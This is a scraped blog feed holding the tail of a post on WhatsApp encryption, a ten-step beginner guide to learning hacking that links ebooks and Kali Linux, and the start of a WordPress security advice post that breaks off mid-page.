<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">So what we can take from this: WhatsApp keeps a separate encrypted session for each contact, and the private keys for those sessions live only on the two devices. The server holds public keys, and the chain keys ratchet forward with every message, so there is nothing on the server side to recover. That makes the device itself the target: if a hacker can clone it (the next post looks at doing this via the MAC address and IMEI), that is the treasure box. Wait for my next post :p</span></span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;">Reference : <a href="http://whatsapp.com/" target="_blank">whatsapp.com</a></span></span></span></span></span></span></span></span></span></span></span></span></span></div>
<div style="text-align: justify;">
<span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"> Learn More : <a href="http://opentechnation.blogspot.com/2015/10/sql-injection-ultimate-tutorial-2015.html" target="_blank">SQL Injection guide </a></span></span></span></span></span></span></span></span></span></span></span></span></span></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-67765602273559760382017-10-29T22:23:00.002+05:302017-11-03T19:42:30.874+05:3010-steps to Learn Hacking with Latest Hacking Guides (2017)<div dir="ltr" style="text-align: left;" trbidi="on">
If you are interested in hacking, you are in the right place. We charge nothing; we are here to share knowledge, so here we will discuss how to learn hacking with the latest hacking guides online, without spending anything from your pocket.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.nextleveltricks.com/wp-content/uploads/2016/04/Best-Websites-To-Learn-Ethical-Hacking.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Learn Hacking With latest Hacking Guides(2017)" border="0" data-original-height="386" data-original-width="654" height="376" src="https://www.nextleveltricks.com/wp-content/uploads/2016/04/Best-Websites-To-Learn-Ethical-Hacking.jpg" title="Learn Hacking With latest Hacking Guides(2017)" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Learn Hacking With latest Hacking Guides(2017)</td></tr>
</tbody></table>
<br />
<br />
You have seen someone online showing off his or her hacking skills, and that is what sent you to Google searching for how to learn hacking with the latest hacking guides. So let us be very clear: it will take time, and by that I mean a lot of time. What I am going to explain here comes from my personal experience with information technology, then programming, and finally hacking, or penetration testing.<br />
.<br />
Most of the people have a misconception about hacking that you will get software or tools to hack some even think that with Linux you can do a lot, but try to understand it's not the thing. if you want o hack then you need to work hard for it and I will discuss here on how to improve skills for hacking and what exactly to start hacking.<br />
<br />
<br />
<h2 style="text-align: left;">
<u>Let's start with " learn Hacking "</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://www.techtechnik.com/wp-content/uploads/2014/11/hacking.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="learn Hacking" border="0" src="http://www.techtechnik.com/wp-content/uploads/2014/11/hacking.jpg" data-original-height="533" data-original-width="800" height="426" title="learn Hacking" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Learn Hacking</td></tr>
</tbody></table>
<div>
<u><br /></u></div>
<div>
<br /></div>
If you want to learn hacking, you need to start with small things. To learn hacking you need to think like a hacker, and the latest hacking guides can help you get there. You may ask what exactly thinking like a hacker means. It is the same as the game of police and thief: to catch a thief you need to think like one. You get there by staying up to date with technology news as well as hacking news. There are several sites dedicated to hacking and to news about hacking, vulnerabilities, exploits, attacks and other tech-related topics; they will serve as the latest hacking guides for you at the beginning of your journey to become a hacker.<br />
<br />
Now let us stick to the topic and see what you should do to become a hacker, slowly and efficiently.<br />
<br />
<h2 style="text-align: left;">
<u>Step 1: Learn Programming</u> </h2>
<div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.techdotmatrix.com/wp-content/uploads/2016/10/Programming-languages.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="How to Learn Hacking with Latest Hacking Guides (2017)" border="0" data-original-height="533" data-original-width="800" height="424" src="https://www.techdotmatrix.com/wp-content/uploads/2016/10/Programming-languages.jpg" title="How to Learn Hacking with Latest Hacking Guides (2017)" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">random coding</td></tr>
</tbody></table>
</div>
<div>
It is the first and most basic thing you need to do, because programming is exactly what will teach you the basics and is the foundation stone of hacking. You should spend at least one hour a day learning to code. You will find various online courses promising that if you take their course you will become a hacker and start hacking everything; let me tell you that it is a lie. If you cannot code, you cannot hack, and that is why I call programming the foundation stone of hacking. You need to be very patient about this, because programming is not an easy job and it will take a lot of your time, energy and mind, but trust me, it will pay off. It is simple: if you want to learn hacking, you need to learn programming. There are various languages worth a try, and you will love them as long as you are interested.</div>
You should try Python because it is good and easy to start with. I have a lot of programming ebooks; depending on the language of your choice, try one of those. Just click on any language and start with it.<br />
<b>Java</b>: It is one of the oldest and most popular programming languages; if you want to <a href="http://opentechnation.blogspot.com/2015/09/java-8-pocket-guide.html" target="_blank">learn Java</a>, just click on the link.<br />
<b>Python:</b> We all know that Python is one of the best programming languages, and learning Python has become a craze among hackers. It is used so much for hacking that authors have even written books dedicated to learning hacking with Python. We have a collection of such books; just click on a book's title and you can download it easily.<br />
<u>Python Ebooks</u>: <a href="http://opentechnation.blogspot.com/2015/09/programming-in-python-3-2nd-edition.html" target="_blank">Programming in Python</a><br />
<a href="http://opentechnation.blogspot.com/2015/09/beginning-python.html" target="_blank">Beginning Python</a><br />
<a href="http://opentechnation.blogspot.com/2015/09/python-pocket-reference-4th-edition.html" target="_blank"> Python Pocket Reference</a><br />
<u>Python Books Dedicated to Hacking:</u> <a href="http://opentechnation.blogspot.com/2015/09/python-hacking-essentials-ebook-download.html" target="_blank">Python Hacking Essential</a> <a href="http://opentechnation.blogspot.com/2015/09/download-free-ebook-black-hat-python-pdf.html" target="_blank">Grey Hat Python</a> <a href="http://opentechnation.blogspot.com/2015/09/download-free-ebook-black-hat-python-pdf.html" target="_blank">Black Hat Python</a><br />
Well, these are the best ebooks you can refer to for learning hacking; yes, they are packed with the latest hacking guides you wish for.<br />
You should download one of those and start taking it seriously; only practice can make you a perfect programmer.<br />
<br />
<h2 style="text-align: left;">
<u>Step 2: Run and Learn UNIX or LINUX like System:</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.ibm.com/developerworks/community/blogs/brian/resource/BLOGS_UPLOADED_IMAGES/varfile.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="How to learn hacking with latest hacking guides" border="0" data-original-height="355" data-original-width="724" height="312" src="https://www.ibm.com/developerworks/community/blogs/brian/resource/BLOGS_UPLOADED_IMAGES/varfile.png" title="How to learn hacking with latest hacking guides" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Linux Shell</td></tr>
</tbody></table>
<div>
<u><br /></u></div>
<div>
<div>
UNIX and Linux-like operating systems are the operating systems of the Internet. While you can learn to use the Internet without knowing UNIX, you cannot be an Internet hacker without understanding UNIX. Thus, the hacker culture today is pretty firmly UNIX-centred. There are many kinds of UNIX-like operating systems, the most popular being Linux, which you can run alongside Microsoft Windows on the same machine. Download Linux from the web or find a local Linux user group to help you with the installation.[1] </div>
<div>
<br /></div>
<div>
A good way to dip your toes in the water is to boot up what Linux fans call a live CD or USB, a distribution that runs entirely off a CD or USB stick without changing your hard disk. It is a way to get a look at the possibilities without doing anything drastic. </div>
<div>
<br /></div>
<div>
There are other UNIX-like operating systems besides Linux, for example the *BSD systems. The most popular *BSD systems are FreeBSD, NetBSD, OpenBSD and DragonFly BSD. All are open source, just like Linux. However, remember that they are BSD and not Linux. </div>
<div>
<br /></div>
<div>
macOS is built on Darwin, a UNIX operating system that is based on FreeBSD. Darwin is completely free and open source and is available from <a href="http://opensource.apple.com/">http://opensource.apple.com</a>. Since the core of the system is UNIX, and macOS is very popular, many people have ported Linux applications to macOS. You can get those programs with a package manager like Homebrew, Fink or MacPorts. Alternatively, you can simply run Linux on a Mac alongside macOS. </div>
<div>
<br /></div>
<div>
If you want to get really niche, you can even run an operating system like OpenIndiana, which is based on the open-source release of the Solaris operating system before it was acquired by Oracle and made closed source. OpenIndiana and Solaris are based on UNIX System V and, as such, are not compatible with Linux applications. That said, there are many ports of Linux applications. You are probably better off simply using macOS, BSD or Linux, since they are much more popular and have many more programs available for them.</div>
</div>
<div>
<u><br /></u></div>
<h2 style="text-align: left;">
<u>Step 3: Start writing HTML/CSS/JavaScript:</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogsimages.adobe.com/creativecloud/files/2016/09/code-10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="How to Learn Hacking with Latest Hacking Guides (2017)" border="0" data-original-height="510" data-original-width="800" height="408" src="https://blogsimages.adobe.com/creativecloud/files/2016/09/code-10.png" title="How to Learn Hacking with Latest Hacking Guides (2017)" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">HTML/CSS/JAVASCRIPT</td></tr>
</tbody></table>
<div>
<u><br /></u></div>
<div>
<div>
If you don't know how to program, learning basic HyperText Markup Language (HTML) and gradually building proficiency is essential. What you see when you look at a website, its images and layout components, is all coded using HTML. As a project, set out to learn how to make a basic landing page and work your way up from there. </div>
<div>
<br /></div>
<div>
In your browser, open the page source to look at the HTML of a real example. Go to Web Developer > Page Source in Firefox and spend time looking at the code. </div>
<div>
<br /></div>
<div>
You can write HTML in a basic text editor like Notepad or SimpleText and save your files as "yourCoolFileName.HTML" so you can open them in a browser and see your work rendered.</div>
</div>
<div>
<br /></div>
<h2 style="text-align: left;">
<u><b>Step 4: Creative Thinking:</b></u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://media.licdn.com/mpr/mpr/AAEAAQAAAAAAAAhGAAAAJGFiMTljMmJkLWZkODEtNDMxMC1iMjUxLWQ3ZmIwYWY3ZWUxZA.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Creative Thinking" border="0" data-original-height="533" data-original-width="800" height="426" src="https://media.licdn.com/mpr/mpr/AAEAAQAAAAAAAAhGAAAAJGFiMTljMmJkLWZkODEtNDMxMC1iMjUxLWQ3ZmIwYWY3ZWUxZA.jpg" title="Creative Thinking" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Creative Thinking</td></tr>
</tbody></table>
<div>
<u><b><br /></b></u></div>
<div>
<div>
Now that you have the fundamental skills in place, you can begin thinking creatively. Hackers are like artists, philosophers and engineers all rolled into one. They believe in freedom and mutual responsibility. The world is full of fascinating problems waiting to be solved. Hackers take a special delight in solving problems, sharpening their skills and exercising their intelligence.</div>
<div>
Hackers have a diversity of interests, culturally and intellectually, outside of hacking. Work as intensely as you play, and play as intensely as you work. For true hackers, the boundaries between "play," "work," "science," and "art" all tend to disappear or to merge into a high-level creative playfulness.</div>
<div>
Read fantasy. Attend fantasy conventions; they are a good way to meet hackers and proto-hackers.</div>
<div>
Consider training in a martial art. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most hacker-ly martial arts are those that emphasize mental discipline, relaxed awareness and control, rather than raw strength, vigour or physical toughness. A martial art of this kind is a sensible choice for hackers.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h2 style="text-align: left;">
<b><u>Step 5: Learn Algorithm:</u></b></h2>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp9j6HMYIPjb11ERJAp6cF_j2LdSS-yT_uh-2NVBFDkS5yVc9s1gmNg93fr_56wLjPQi5PhtoZIptUl1Ath-gQyVdNly1F8WaCLzHYKxIsX5mrC9ImcSMgHSBdjhQfkNv3bXaUfmjVPbqb/s1600/bigpreview_Computer+Brain.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Learn Algorithm" border="0" data-original-height="444" data-original-width="710" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp9j6HMYIPjb11ERJAp6cF_j2LdSS-yT_uh-2NVBFDkS5yVc9s1gmNg93fr_56wLjPQi5PhtoZIptUl1Ath-gQyVdNly1F8WaCLzHYKxIsX5mrC9ImcSMgHSBdjhQfkNv3bXaUfmjVPbqb/s1600/bigpreview_Computer+Brain.jpg" title="Learn Algorithm" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Algorithm</td></tr>
</tbody></table>
</div>
No problem should ever have to be solved twice. Think of it as a community in which the time of most hackers is precious. Hackers believe that sharing information is an ethical responsibility. When you solve a problem, make the information public to help everybody who faces the same issue.<br />
You don't have to believe that you are obliged to give all of your creative product away, although the hackers who do are the ones who get the most respect from other hackers. It is in line with hacker values to sell enough of it to keep you in food, rent and computers.<br />
Read older items, like the "Jargon File" or the "Hacker Manifesto" by The Mentor. They may be out of date regarding technical problems, but the attitude and spirit are just as timely.<br />
<br />
<br />
<h2 style="text-align: left;">
<u>Step 6: Ability to Solve Problem:</u><span style="font-weight: normal;"> </span></h2>
<div>
<span style="font-weight: normal;"> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://media.licdn.com/mpr/mpr/shrinknp_800_800/AAEAAQAAAAAAAATYAAAAJDA0YmY5ZjQ3LTAwYjYtNDJmZC04ZWMwLTRmZjQ4MzUxZWMzNw.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Problem Solving" border="0" data-original-height="306" data-original-width="460" height="424" src="https://media.licdn.com/mpr/mpr/shrinknp_800_800/AAEAAQAAAAAAAATYAAAAJDA0YmY5ZjQ3LTAwYjYtNDJmZC04ZWMwLTRmZjQ4MzUxZWMzNw.jpg" title="Problem Solving" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">problem Solving</td></tr>
</tbody></table>
</span></div>
<div>
<div>
No problem should ever have to be solved twice. Think of it as a community in which the time of most hackers is precious. Hackers believe that sharing information is an ethical responsibility. When you solve a problem, make the knowledge public to help everybody who faces the same issue.</div>
<div>
You don't have to believe that you are obliged to give all of your creative product away, though the hackers who do are the ones who get the most respect from other hackers. It is in line with hacker values to sell enough of it to keep you in food, rent and computers.</div>
<div>
Read older items, like the "Jargon File" or the "Hacker Manifesto" by The Mentor. They may be out of date concerning technical problems, but the attitude and spirit are just as timely.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h2 style="text-align: left;">
<u>Step 7: Write open-source software/codes</u></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://image.slidesharecdn.com/opensourcesoftwaredevelopment-160923145842/95/open-source-software-development-14-638.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="479" data-original-width="638" height="480" src="https://image.slidesharecdn.com/opensourcesoftwaredevelopment-160923145842/95/open-source-software-development-14-638.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Open-source Softwares</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<u><br /></u></div>
<div>
Write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use. Hackerdom's most revered demigods are the people who have written large, capable programs that met a widespread need and gave them away, so that now everybody uses them.</div>
<br />
<br />
<h2 style="text-align: left;">
<u>Step 8: Post Articles on hacking online</u></h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ghostwriterhub.com/wp-content/uploads/2015/09/article-writing-service.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://ghostwriterhub.com/wp-content/uploads/2015/09/article-writing-service.jpg" data-original-height="533" data-original-width="800" height="425" width="640" /></a></div>
<div>
<u><br /></u></div>
<div>
Another good thing to do is to collect and filter useful and interesting information into web pages or documents such as Frequently Asked Questions (FAQ) lists and make those available. Maintainers of major technical FAQs get almost as much respect as open-source authors.</div>
<h2 style="text-align: left;">
<u><b><br /></b></u><b><u>Step 9: Serve the hacker culture itself. This isn't something you will be positioned to do until you have been around for a while and become well known for one of the four previous things</u></b></h2>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blog.finjan.com/wp-content/uploads/2017/03/Hacking-Techniques.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="hacking" border="0" data-original-height="318" data-original-width="450" height="452" src="https://blog.finjan.com/wp-content/uploads/2017/03/Hacking-Techniques.jpg" title="hacking" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Hacking</td></tr>
</tbody></table>
<b><u><br /></u></b></div>
The hacker culture does not have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. Once you have been in the trenches long enough, you may grow into one of these.<br />
Hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to position yourself so that it drops in your lap, and then be modest and gracious about your status. <br />
<br />
<h2 style="text-align: left;">
<b><u>Step 10: Start With Kali Linux Penetration Testing</u></b></h2>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://www.kali.org/wp-content/uploads/2016/01/kali-rolling-screenshot.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Kali Linux Screenshot" border="0" data-original-height="462" data-original-width="800" height="368" src="https://www.kali.org/wp-content/uploads/2016/01/kali-rolling-screenshot.png" title="Kali Linux penetration Testing" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Kali Linux</td></tr>
</tbody></table>
<div>
I was actually about to write 9 steps to learn hacking with the latest hacking guides, but then Kali Linux came to mind. If you are here to learn hacking, you must be quite familiar with Kali Linux; it is an all-in-one penetration testing suite, so let's go deeper into it.<br />
Kali Linux is a Debian-based operating system whose primary objective is to serve as a complete penetration testing suite, which makes it a nice platform to start learning hacking and a career in it. It is really easy to use Kali Linux for security auditing, security research and computer forensics. Trust me, it is an arsenal for hacking, but you should not depend on Kali Linux completely. Yes, it will help you learn the concepts behind various hacking and penetration testing techniques, but tools cannot make someone a hacker, and most of them are outdated or no longer supported, so depending on them completely is useless. It is open source, so grab a copy and either install it or run it live; it will help you a lot. It will also help you learn Linux and its bash commands. My suggestion is to give it a try, and I will suggest some eBooks that will help you understand various concepts of hacking.<br />
<br />
Recommended eBooks : <a href="http://opentechnation.blogspot.com/2015/10/download-free-ebook-penetration-testing.html" target="_blank">Penetration Testing</a> , <a href="http://opentechnation.blogspot.com/2015/09/kali-linux-wireless-penetration-testing.html" target="_blank">Kali Linux Wireless penetration Testing</a> , Web <a href="http://opentechnation.blogspot.com/2015/09/web-penetration-testing-with-kali-linux.html" target="_blank">Penetration Testing with Kali Linux</a> .<br />
<br />
Resources : <a href="https://www.kali.org/" target="_blank">Kali Linux </a><br />
<a href="http://wikihow.com/" target="_blank">Wikihow</a><br />
<br />
<br />
<br />
<u></u><b><u></u></b></div>
</div>
How To Secure WordPress Website (2017 updated) (published 2017-10-27)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtcPGvdTLCXrA9dVEbr51GosYoSymXEiTQ_46sJ7GpYZcH9giePCoTjuoQhXUCke9mH4pKAAfEEwKD0JQiIxthROeg9UVkYa6v6V1YWbGm6_3rxFoeGaM2pkkywrJ30UZnRl-gPHOZ9bmx/s1600/wordpress-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="620" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtcPGvdTLCXrA9dVEbr51GosYoSymXEiTQ_46sJ7GpYZcH9giePCoTjuoQhXUCke9mH4pKAAfEEwKD0JQiIxthROeg9UVkYa6v6V1YWbGm6_3rxFoeGaM2pkkywrJ30UZnRl-gPHOZ9bmx/s400/wordpress-security.png" width="400" /></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
As WordPress is the leading CMS on the Internet, it also carries a high risk from hackers, so in this post we will discuss how to secure WordPress, with or without plugins, along with best practices and tips for various issues and vulnerabilities, to defend against hackers.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
So, we sat down with security expert and Incsub CTO Aaron Edwards to learn more about WordPress security and the steps administrators can take to keep their WordPress themes and plugins secure.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">1. How can I tell if my WordPress theme and plugins are secure?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
There are some great free tools like <a href="https://premium.wpmudev.org/wp-checkup/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">WP Checkup</a> that can help check your site for plugin and theme vulnerabilities. Scheduling checkups and making frequent updates can keep your site safe.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Because WordPress is open source and many of the themes and plugins are distributed under a GPN or GPL license, it is easy for themes and plugins to be “forked” and redistributed on free WordPress plugin and theme sites with additional malicious code. This added code may simply add hidden linkbacks or redirect your site. However, it could also install a virus or even expose your users to identity theft.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
These types of attacks can be avoided in five ways:</div>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; list-style-image: initial; list-style-position: initial; margin: 0px 1.5em 1.5em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">First, when utilizing free plugins, research the author and only download the plugin files from the author’s site or from the WordPress Plugin repository (if listed).</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Ask advice regarding the safety of a plugin or theme from a trusted WordPress community. Ask questions on support forums like <a href="http://wordpress.org/support/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">http://wordpress.org/support/</a>, <a href="http://premium.wpmudev.org/forums/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">http://premium.wpmudev.org/forums/</a> or <a href="https://poststatus.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Post Status</a>.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">If you are going to use trusted free plugins or themes, check the version compatibility listing and verify the plugin or theme is still supported and updated. Many free themes and plugins are slow to receive updates or are abandoned. Using old plugins or themes can leave you exposed to attack, especially after a security update.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">If you don’t use it, lose it. Code from plugins and themes you no longer use still leaves vulnerabilities, even if they are not activated. Remove all unnecessary code, including plugins and themes that you no longer use.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">One of the best ways to protect yourself from utilizing weak or malicious code is to use paid, supported themes and plugins. Companies and communities like WPMU DEV provide 100% guaranteed, time-tested support, updates and plugins that help ensure your site is prepared to stand against attacks.</li>
</ol>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
While using trusted, well-coded plugins and themes will not protect your WordPress site against all attacks, our experience shows nearly all WordPress attacks could be stopped by simply using safe, up-to-date and well-written code.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you want to save time, set up <a href="https://premium.wpmudev.org/blog/introducing-automate/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Automate</a> updates. The Hub site manager will automatically back up and update all your plugins and themes, and uses “Safe Upgrade” technology to provide worry-free update checks and reports.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
